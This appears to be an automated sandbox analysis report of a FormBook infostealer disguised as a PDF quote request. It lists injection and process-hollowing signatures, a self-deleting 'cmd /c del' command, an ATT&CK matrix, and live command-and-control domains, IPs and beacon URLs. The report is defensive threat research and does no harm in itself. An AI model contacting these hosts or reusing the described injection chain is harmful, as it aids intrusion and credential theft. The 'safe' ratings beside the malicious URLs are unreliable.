          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 4004Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 4004Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 870000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 743008Jump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00AA1201
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A82BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00A82BA5
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AAB226 SendInput,keybd_event,0_2_00AAB226
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AC22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00AC22DA
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00AA0B62
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00AA1663
          Source: RFQ PC25-1301 Product Specifications_PDF.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000000.2343927005.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770644430.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, explorer.exe, 00000003.00000000.2345314189.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2343927005.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770644430.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.2343927005.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770644430.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.2343445045.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4769961785.0000000000D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
          Source: explorer.exe, 00000003.00000000.2343927005.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770644430.00000000013A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000003.2979322118.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348802491.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A60698 cpuid 0_2_00A60698
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00AB8195
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A9D27A GetUserNameW,0_2_00A9D27A
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A7B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00A7B952
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A442DE

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: RFQ PC25-1301 Product Specifications_PDF.exeBinary or memory string: WIN_81
          Source: RFQ PC25-1301 Product Specifications_PDF.exeBinary or memory string: WIN_XP
          Source: RFQ PC25-1301 Product Specifications_PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: RFQ PC25-1301 Product Specifications_PDF.exeBinary or memory string: WIN_XPe
          Source: RFQ PC25-1301 Product Specifications_PDF.exeBinary or memory string: WIN_VISTA
          Source: RFQ PC25-1301 Product Specifications_PDF.exeBinary or memory string: WIN_7
          Source: RFQ PC25-1301 Product Specifications_PDF.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AC1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00AC1204
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AC1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00AC1806

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		1
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		21
          Input Capture          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol21
          Input Capture          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
          Valid Accounts          		3
          Obfuscated Files or Information          		Security Account Manager1
          File and Directory Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          DLL Side-Loading          		NTDS215
          System Information Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection          		2
          Valid Accounts          		LSA Secrets341
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
          Virtualization/Sandbox Evasion          		Cached Domain Credentials12
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
          Access Token Manipulation          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job612
          Process Injection          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589987 Sample: RFQ PC25-1301 Product Speci... Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 36 www.maheshg.xyz 2->36 38 www.86339.xyz 2->38 40 13 other IPs or domains 2->40 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 10 other signatures 2->52 11 RFQ PC25-1301 Product Specifications_PDF.exe 1 2->11         started        signatures3 50 Performs DNS queries to domains with low reputation 38->50 process4 signatures5 62 Binary is likely a compiled AutoIt script file 11->62 64 Writes to foreign memory regions 11->64 66 Maps a DLL or memory area into another process 11->66 14 svchost.exe 11->14         started        process6 signatures7 68 Modifies the context of a thread in another process (thread injection) 14->68 70 Maps a DLL or memory area into another process 14->70 72 Sample uses process hollowing technique 14->72 74 3 other signatures 14->74 17 explorer.exe 53 1 14->17 injected process8 dnsIp9 30 ilsgroup.net 172.104.236.215, 49751, 80 LINODE-APLinodeLLCUS United States 17->30 32 maheshg.xyz 217.21.91.24, 49753, 80 IPPLANET-ASIL United Kingdom 17->32 34 3 other IPs or domains 17->34 42 System process connects to network (likely due to code injection or exploit) 17->42 21 help.exe 17->21         started        24 autoconv.exe 17->24         started        signatures10 process11 signatures12 54 Modifies the context of a thread in another process (thread injection) 21->54 56 Maps a DLL or memory area into another process 21->56 58 Tries to detect virtualization through RDTSC time measurements 21->58 60 Switches to a custom stack to bypass stack traces 21->60 26 cmd.exe 1 21->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RFQ PC25-1301 Product Specifications_PDF.exe37%ReversingLabsWin32.Backdoor.FormBook
          RFQ PC25-1301 Product Specifications_PDF.exe100%AviraDR/AutoIt.Gen8
          RFQ PC25-1301 Product Specifications_PDF.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.vibrantsoul.xyzReferer:0%Avira URL Cloudsafe
          http://www.maheshg.xyzReferer:0%Avira URL Cloudsafe
          http://www.7b5846.online/hwu6/0%Avira URL Cloudsafe
          http://www.piedmontcsb.info/hwu6/0%Avira URL Cloudsafe
          http://www.91uvq.pro/hwu6/www.maheshg.xyz0%Avira URL Cloudsafe
          http://www.piedmontcsb.info/hwu6/www.moocatinght.top0%Avira URL Cloudsafe
          http://www.ilsgroup.net/hwu6/0%Avira URL Cloudsafe
          http://www.7b5846.onlineReferer:0%Avira URL Cloudsafe
          http://www.moocatinght.top/hwu6/www.suv-deals-49508.bond0%Avira URL Cloudsafe
          http://www.91uvq.pro/hwu6/0%Avira URL Cloudsafe
          http://www.vibrantsoul.xyz0%Avira URL Cloudsafe
          http://www.86339.xyz0%Avira URL Cloudsafe
          http://www.piedmontcsb.info0%Avira URL Cloudsafe
          http://www.hair-transplantation-65829.bond/hwu6/www.gequiltdesins.shop0%Avira URL Cloudsafe
          http://www.maheshg.xyz/hwu6/0%Avira URL Cloudsafe
          http://www.ilsgroup.netReferer:0%Avira URL Cloudsafe
          http://www.health-insurance-cake.world0%Avira URL Cloudsafe
          http://www.ozzd86fih4.online/hwu6/www.piedmontcsb.info0%Avira URL Cloudsafe
          http://www.moocatinght.top/hwu6/0%Avira URL Cloudsafe
          http://www.hair-transplantation-65829.bond/hwu6/0%Avira URL Cloudsafe
          http://www.gequiltdesins.shop/hwu6/0%Avira URL Cloudsafe
          http://www.86339.xyz/hwu6/0%Avira URL Cloudsafe
          http://www.ozzd86fih4.onlineReferer:0%Avira URL Cloudsafe
          http://www.d66dr114gl.bond/hwu6/0%Avira URL Cloudsafe
          http://www.simo1simo001.click/hwu6/0%Avira URL Cloudsafe
          http://www.7b5846.online/hwu6/?CXFd8=YeF1y3E0QpZaaHwaKvJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd2HkwQuXQqI9c12LSg==&Ez=ltxdQ8m0%Avira URL Cloudsafe
          http://www.maheshg.xyz/hwu6/www.hair-transplantation-65829.bond0%Avira URL Cloudsafe
          http://www.maheshg.xyz0%Avira URL Cloudsafe
          http://www.simo1simo001.click/hwu6/www.ilsgroup.net0%Avira URL Cloudsafe
          http://www.86339.xyz/hwu6/www.d66dr114gl.bond0%Avira URL Cloudsafe
          http://www.backstretch.store0%Avira URL Cloudsafe
          http://www.d66dr114gl.bondReferer:0%Avira URL Cloudsafe
          http://www.ilsgroup.net/hwu6/www.7b5846.online0%Avira URL Cloudsafe
          http://www.backstretch.storeReferer:0%Avira URL Cloudsafe
          http://www.ozzd86fih4.online/hwu6/0%Avira URL Cloudsafe
          http://www.health-insurance-cake.worldReferer:0%Avira URL Cloudsafe
          http://www.91uvq.pro0%Avira URL Cloudsafe
          http://www.86339.xyzReferer:0%Avira URL Cloudsafe
          http://www.suv-deals-49508.bond/hwu6/0%Avira URL Cloudsafe
          http://www.7b5846.online/hwu6/www.91uvq.pro0%Avira URL Cloudsafe
          http://www.health-insurance-cake.world/hwu6/www.vibrantsoul.xyz0%Avira URL Cloudsafe
          http://www.gequiltdesins.shop/hwu6/?CXFd8=+zwICv/sB1e6MtWwpRel8f5Q0bYKICZzsoJO8W/+cdiLpY7N+AEBhZIv3jjSTSPlRhhnl/FLAA==&Ez=ltxdQ8m0%Avira URL Cloudsafe
          http://www.gequiltdesins.shop/hwu6/www.backstretch.store0%Avira URL Cloudsafe
          http://www.ozzd86fih4.online0%Avira URL Cloudsafe
          http://www.health-insurance-cake.world/hwu6/0%Avira URL Cloudsafe
          https://301.gn301.com:4500/?u=0%Avira URL Cloudsafe
          http://www.maheshg.xyz/hwu6/?CXFd8=FXfZ1xOYYW9swHejpVIfMDCztZ/FrnQZeJUgNQ4rzoTHCxvijkBbGX2//Z/tWIGDAo4gMXnXlg==&Ez=ltxdQ8m0%Avira URL Cloudsafe
          http://www.d66dr114gl.bond/hwu6/www.ozzd86fih4.online0%Avira URL Cloudsafe
          http://www.moocatinght.topReferer:0%Avira URL Cloudsafe
          http://www.hair-transplantation-65829.bondReferer:0%Avira URL Cloudsafe
          http://www.simo1simo001.click/hwu6/?CXFd8=VqwCA0fDirS9FNcK+XWY5HArCimG0sfrxcJclabbIM4+tzWzOeCWxbUPg8n3aCtVsQmTH2yodQ==&Ez=ltxdQ8m0%Avira URL Cloudsafe
          http://www.ilsgroup.net0%Avira URL Cloudsafe
          http://www.91uvq.proReferer:0%Avira URL Cloudsafe
          http://www.suv-deals-49508.bond0%Avira URL Cloudsafe
          http://www.vibrantsoul.xyz/hwu6/0%Avira URL Cloudsafe
          http://www.simo1simo001.click0%Avira URL Cloudsafe
          www.7b5846.online/hwu6/0%Avira URL Cloudsafe
          http://www.7b5846.online0%Avira URL Cloudsafe
          http://www.vibrantsoul.xyz/hwu6/www.86339.xyz0%Avira URL Cloudsafe
          http://www.hair-transplantation-65829.bond0%Avira URL Cloudsafe
          http://www.gequiltdesins.shopReferer:0%Avira URL Cloudsafe
          http://www.gequiltdesins.shop0%Avira URL Cloudsafe
          http://www.suv-deals-49508.bondReferer:0%Avira URL Cloudsafe
          http://www.d66dr114gl.bond0%Avira URL Cloudsafe
          http://www.moocatinght.top0%Avira URL Cloudsafe
          http://www.backstretch.store/hwu6/www.health-insurance-cake.world0%Avira URL Cloudsafe
          http://www.backstretch.store/hwu6/0%Avira URL Cloudsafe
          http://www.simo1simo001.clickReferer:0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          maheshg.xyz
          		217.21.91.24
          		truetrue
            		unknown
            www.simo1simo001.click
            		164.92.166.75
            		truetrue
              		unknown
              www.7b5846.online
              		104.21.40.196
              		truetrue
                		unknown
                www.gequiltdesins.shop
                		104.21.80.156
                		truetrue
                  		unknown
                  ssl1.prod.systemdragon.com
                  		104.18.188.223
                  		truetrue
                    		unknown
                    huayang.302.gn301.xyz
                    		23.225.71.166
                    		truetrue
                      		unknown
                      ilsgroup.net
                      		172.104.236.215
                      		truetrue
                        		unknown
                        www.ilsgroup.net
                        		unknown
                        		unknowntrue
                          		unknown
                          www.backstretch.store
                          		unknown
                          		unknowntrue
                            		unknown
                            www.d66dr114gl.bond
                            		unknown
                            		unknowntrue
                              		unknown
                              www.91uvq.pro
                              		unknown
                              		unknowntrue
                                		unknown
                                www.health-insurance-cake.world
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.maheshg.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.86339.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.hair-transplantation-65829.bond
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.7b5846.online/hwu6/?CXFd8=YeF1y3E0QpZaaHwaKvJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd2HkwQuXQqI9c12LSg==&Ez=ltxdQ8mtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.gequiltdesins.shop/hwu6/?CXFd8=+zwICv/sB1e6MtWwpRel8f5Q0bYKICZzsoJO8W/+cdiLpY7N+AEBhZIv3jjSTSPlRhhnl/FLAA==&Ez=ltxdQ8mtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.maheshg.xyz/hwu6/?CXFd8=FXfZ1xOYYW9swHejpVIfMDCztZ/FrnQZeJUgNQ4rzoTHCxvijkBbGX2//Z/tWIGDAo4gMXnXlg==&Ez=ltxdQ8mtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.simo1simo001.click/hwu6/?CXFd8=VqwCA0fDirS9FNcK+XWY5HArCimG0sfrxcJclabbIM4+tzWzOeCWxbUPg8n3aCtVsQmTH2yodQ==&Ez=ltxdQ8mtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        www.7b5846.online/hwu6/true
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.ilsgroup.net/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.maheshg.xyzReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.7b5846.online/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.vibrantsoul.xyzReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000000.2348289293.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://word.office.comMexplorer.exe, 00000003.00000003.2981042434.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4780334322.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980858882.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.piedmontcsb.info/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.piedmontcsb.info/hwu6/www.moocatinght.topexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
